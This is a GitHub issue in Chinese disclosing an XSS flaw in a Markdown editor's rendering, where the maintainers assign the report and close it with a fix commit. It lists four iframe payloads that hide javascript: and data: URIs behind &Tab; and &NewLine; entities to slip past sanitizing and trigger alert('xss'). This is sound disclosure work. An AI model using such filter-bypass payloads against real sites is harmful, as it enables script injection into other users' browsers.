Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS 代码注入漏洞 - iframe #1400

Closed
Chenrt-ggx opened this issue May 13, 2023 · 1 comment
Closed

XSS 代码注入漏洞 - iframe #1400

Chenrt-ggx opened this issue May 13, 2023 · 1 comment
Assignees
Milestone

Comments

@Chenrt-ggx
Copy link

Payload:

<iframe src="java&Tab;script:alert('xss')"></iframe>

put some text here then iframe got xss
<iframe src="java&NewLine;script:alert('xss')"></iframe>

put some text here then iframe got xss
<iframe src="data&Tab;:text/html,%3Cscript%3Ealert('xss')%3C%2Fscript%3E"></iframe>

put some text here then iframe got xss
<iframe src="data&NewLine;:text/html,%3Cscript%3Ealert('xss')%3C%2Fscript%3E"></iframe>

put some text here then iframe got xss

PoC:

其它:

同样是 lute 的问题,见相关 issue;官网示例里面的版本好像没更新,这个 issue 里面的洞还在。

@88250 88250 self-assigned this May 14, 2023
@88250 88250 added this to the 3.9 milestone May 14, 2023
@88250 88250 changed the title XSS 代码注入漏洞(第二弹) XSS 代码注入漏洞 May 14, 2023
@88250 88250 assigned Vanessa219 and unassigned 88250 May 14, 2023
@Vanessa219 Vanessa219 changed the title XSS 代码注入漏洞 XSS 代码注入漏洞 - iframe May 14, 2023
@Vanessa219
Copy link
Owner

6c1908d

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants